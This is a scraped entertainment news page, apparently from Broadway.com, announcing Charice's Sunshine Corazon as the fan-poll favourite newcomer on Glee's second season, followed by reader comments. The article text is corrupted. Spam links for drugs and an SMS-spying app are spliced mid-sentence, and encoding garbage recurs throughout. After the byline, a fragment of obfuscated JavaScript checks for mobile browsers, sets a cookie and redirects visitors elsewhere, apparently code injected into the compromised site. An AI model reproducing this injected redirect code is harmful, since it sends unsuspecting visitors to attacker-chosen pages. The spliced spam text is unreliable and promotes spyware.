Categorized | Buzz, Glee

Glee Poll Results: Filipina Singing Sensation Charice Is Your Fave Newcomer

Glee Poll Results: Filipina Singing Sensation Charice Is Your Fave Newcomer

In honor of Glee returning to us after a long, hot, horribly Glee-free summer, we here at Broadway.com wanted to know: who was your favorite season two addition to the halls of McKinley High? Well, the results are in for our very first Glee poll of the season, and your favorite new cast member isai??i??

Sunshine Corazon! This exchange student may have jumped ship for Vocal Buy lasuna leaf Adrenaline before she even gave New Directions a try, but sheai??i??s still number one in your hearts. Played by pint-sized, Oprah-approved, YouTube-adored vocal powerhouse Charice Pempengco, Sunshine walked away with a win after securing 46% of the vote.

Broadway darling Cheyenne Jackson came in a close second as http://www.hisark.com/arimidex-cost-bodybuilding/ new Vocal Adrenaline coach Dustin Goolsby, followed by Dot Jones as football coach Shannon Bieste and Chord Overstreet as new golden boy Sam Evans. If her bad-ass sing-off with Rachel (Lea Michele) cover Lady Gaga and Beyonceai??i??s “Telephone” is any indication, Sunshine is here to stay!

http://fustaillar.com/sms-spy-spy-on-iphone/ Sunshine Corazon won your heartsai??i??and our pollai??i??as your favorite new character on ‘Glee.’
Season two’s first episode introduces four new faces at McKinley High. There’s female football coach Shannon Beiste (Dot Jones), glee club wannabes Sam Evans (Chord Overstreet) and Sunshine Corazon (Charice Pempengco) andai??i??yes!ai??i??Vocal Adrenaline’s hot new coach Dustin Goolsby (Cheyenne Jackson).

Poll Glee New Character Glee Poll Results: Filipina Singing Sensation Charice Is Your Fave Newcomer

By Broadway.com Staff

“Glee” Archive — More from Sunshine Corazon

750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

34 Responses to “Glee Poll Results: Filipina Singing Sensation Charice Is Your Fave Newcomer”

1. Josh says:

Why the music world is going crazy to Charice, Justin and Gaga????
    the answer is very simple……………… they are the most talented & famous performers today, the world awaiting for a grand concert of these 3 great power in one night concert!!!

2. chpneyhomo says:
    CHARICE WILL NOT BE ON EACH AND EVERY EPISODE OF GLEE SEASON2……. BUT THERE WILL ALWAYS BE SOME SCENES……. ON EACH EPISODE………. THAT WILL BE ABOUT CHARICE… ALWAYS SOMETHING THERE TO REMIND ME/US…….. POINTING TOWARDS HER…….ALL HEADS HAVE BEEN BLOWN AWAY IF NOT AWAKEN OR MAKING SENSE…….

3. The bias for Charice and Asians is clear.

Take it from David Foster huimself, a Canadian.
    “We Canadian has to work doubly hard in the US to be recognize.

Of course, we can always dream and try !

4. chafever says:
    Bigfan has a credible point. We SHOULD buy Charice’s music to show our real support and appreciation for all the joy she brings us.

5. vicky says:
    AS FAR AS WE ALL CONCERN,..WE ALL WISH FOR THE PRODUCER OF GLEE 2 SEASON CAN HAVE MORE INTERSET OF CHARICE,.TO MAKE CHARICE SHOWN IN EVERY WEEKLY SHOW,.FOR WHICH I THINK THE POPULARITY,CAPABILITY AND ABILITY OF HER WOULD BRING UP THE MORE HIGHER RATINGS,..COZ PEOPLE OF THE WORLD WHO KNOWS AND LOVED AND SUPPORTED HER SINCERELY CAN PROVED THAT IT HELPS MUCH,..WE HOPE FOR IT,.MORE POWER FOR THE WHOLE STAFF AND GODBLESSES YOU ALL!!!!
    ——

Pls. use small letters next time Vicky…thanks.

6. eve says:
    I’m really looking forward to more battles between Beiste & Sue, they were hilarious in the first episode. mmm… I wonder if she’ll have same screen time as Charice this season, about 10 episodes. I’m surprised the VA coach got second cuz he was only in one scene for like 30 seconds lol. I guess he’s the better known actor. Of course, Charice is my favorite new character.. Dot-Marie Jones seems nice and fun in real life. Here’s a clip from e!news including Charice in the last 30 seconds. http://www.youtube.com/watch?v=Om12TdJ-Swo

7. chengna2010 says:
    “You are my sunshine,
    My only sunshine
    You make me happy
    Whe skies are gray.
    You’ll never know dear
    How much I love you
    Please make my sunshine shines forever”

8. sonny says:
    Charice is simply the best..a very talented performer that everyone would love to see her sing and perform.

Charice was correct when she sung the first time with Ellen that ” YOU’LL GONNA LOVE HER” well she deserves to be loved.

She always give her more than 100% best.

Its a God given talent + hardwork + working with the best..perfect!

9. benny65 says:
    Congrats!!! I’m proud to be a chasgleek!!

10. Yehh right we vote for Charice… She’s the best on the first episode and I think also on next, next and many other episodes she will appear… We support you Charice!!!

11. jaju says:
    That’s right let’s support Charice all the way, everytime. Go and download her iTune music. I did and I had been listening to her Listen and Telephone songs since then. I do not subscribe to anyone but Charice. We are million fans so let’s make it happen. It’s only $2.99 hello….forego your starbuck coffee for the day and get Listen and Telephone or or just Listen. I also, downloaded the episode one ‘Audition’ so I could watch her day in and day out, before I go to bed.

12. flor from texas says:
    Congrats to you! Charice. You are absolutely wonderful, charming, talented, a radiant star, a precious gem, and our Cinderella. May God will watch over you and guide you so you won’t be lost like others after all the fame and money they have.

13. Anthony says:
    Sunshine, on my shoulders – makes me happy
    Sunshine, in my eyes – can make me cry
    Sunshine, on the water – looks so lovely
    Sunshine, almost always – makes me high!

Please don’t take my Sunshine away! :)

14. idolming says:
    Yup! The name “Sunshine” is really meant for Charice! There’ll be no more Storm and the Sun will always shine for Charice! May God always guide you on your path! You filled my heart w/ so much joy Charice! IWALY!

15. Portia says:
    I am not surprised of all those raving reviews about Charice peformance in Glee, she is the freshest face and the most talented girl in the world, everything she does is not only good but great. I am so proud of you Charice. Looking forward to see you more in GLEE.

16. marvic says:
    Charice Effect on Glee ripples of Oprah Effect?

Read the whole story here:

17. yoly says:
    You are the Sunshine of my life Charice. I’m so proud of you.

18. mpasig52 says:
    Charice,we are so happy for you.We are so excited about your role as Sunshine Corazon. You are the sunshine of our lives!

19. madzee says:
    approved! thumbs up!

20. Bigfan says:
    I’m so happy for Charice! My hubby and I declared Sept 21 as Glee-day in our home! Been watching tweets about her. :)

However, I can’t help but notice that her popularity (against the other newbies in the show) does not translate to itunes sale. I have been watching the Itunes top 10, and Chord’s song Billionaire is always (up by at least 3 spots) leading Charice’s Listen.

So this led me to believe that Charice’s audience/fans don’t care to download the song in Itunes? She is up 37% compared to Chord by popularity, but her song sold less than the less popular newbie.

IMHO, and I can be wrong, is that if the poll truly represents the popularity of charice in America, and if all of the people who thought they like Charice buys/downloads the song.. then it can easily go to #1.

But then again, if Charice’s fanbase is above tweens/teens, then these people might not be as Itunes crazy/download crazy…

She started in YouTube, and har fanbase is in YouTube, but YouTube does not pay.

Wish her fanbase would “grow/mature” and switch media from YouTube to mp3/CD/albums. So Charice gets paid, and she can continue to do what she does – that we abcolutely love love love!

• Leir says:
      I couldn’t agree more Bigfan, with all the Chasters globally we should have able to put her on the #1 spot, watching her in youtube is great coz that where she started and I’m thankful for that, but it doesn’t generate income for her and it doesn’t pay her company for all the expenses just to travel her around. Like you said once in a while we have to go away from watching her in youtube for free and buy or download her music instead. We want her to be around for a long haul but we need to help her generate income for her and her company. just my thought.

• gleek-den says:
      This could be true.. but in her (Charice) defense, majority of the fans might like Telephone more than Listen. It’s at number 2 and it’s still by Sunshine. : )

• Bigfan says:
        Gleek-den

I guess you have a point. However, Telephone is a duet by Lea Michelle and Charice. So some sales can be attributed to Lea.

Listen is a solo by Charice. It’s more predictive, as there is no guess work there which fanbase downloaded it…

• Cizcan says:
      Bigfan:

The sales on CD/Download format of music has been on a steady decline due to piracy, and music sharing websites. The real money maker nowadays are LIVE concerts/DVD and music videos. That’s why DF&F is going to Asia on October for a series of LIVE concerts. That’s why this trend is more of a blessing to Charice because as we all know and acknowledge-She is one of the best live performer in the world at this moment in time!!!!GO Charice and continue to blow people away with your unbelievable voice- just like what you did in GLEE!!!!!! I already bought a ticket for her upcoming Oct.15, Las Vegas concert(Price; $150.00)-now that’s what a Chaster should do to really support her!!!Godbless!!!

• Bigfan says:
        Cizcan,

Lady Gaga and Beyonce sold millions of albums… and here is a clip I got from hollywoodlife.com

“Bieber has now sold 3.2 million copies of his “My World” (released last November) and “My World 2.0″ (March) in the US, plus 7.7 million songs digitally downloaded, according to Nielsen SoundScan.” This combined with his overseas sales gives him over 4 million albums sold!

So here are my questions/(and some answers I also provided):

1. Is the decline of sales in CD/digital songs true?

Answer: Based on the sales of Bieber and other artists, this trend can be overcome. If Charice sells half of these numbers, it would still be amazing.

2. Charice is hands down the best singer in her generation. Is not good enough for fans to pay for her CD/digital songs?

Answer: Depends on where the fans are. If the majority of fanbase are from countries where Itunes and on-line download transactions are not available, or fans are not economically able to buy, then these fans are going to continue watching in Youtube.

3. So what is the deal?

Answer: Charice can top all the charts and online popularity contest (you don’t need a credit card/gift card to vote). But it won’t mean she will get paid accordingly.

4. So what is the solution?

Answer: Charice needs to be marketed (more) to the paying demographics/countries. If she gets paid enough, she may even be able to continue providing free entertainment to her non-paying youtube fans. I think they are already doing this… so we just have to wait and see. Glee was a big move, I hope the momentum does not stop.

5. So?

Answer: So, those who are able to download (legally), do it. Those who are able to buy the CD, buy now.

21. daddy ron says:
    Sunshine(Charice) is the hottesstt. Mainstream US love her so much they can’t stop talking about her…me too =)

22. krazyforyou says:
    I can’t agree more fellow Gleeks! Sunshine Corazon is the next face of Glee! God bless you Charice! Keep on shining!!!!

23. gunrunner says:
    ……speechless

24. DL says:
    Wow! that is absolutely a refreshing news! It confirms that She has what it takes to be on top! and of course She has all the Chasters to support her all the way up! I am proud of you Charice

25. monscorpio says:
    congratulations, charice!you are helping the music industry getting back its sanity..i appreciate the influential david foster,oprah,ellen and ryan murphy for their belief in her musical talent..

26. Ohyayay123 says:
    Isn’t this good news? I mean, people loved her as a new comer in Glee. So I think they’ll let charice appear in every episodes of GLEE. That would be exiciting. SUNSHINE CORAZON<3

27. ebjohns11 says:
    i read about this yesterday and im so happy that she won and that the gleeks loves her too!!! so who else forgot to write up a review about charice??lol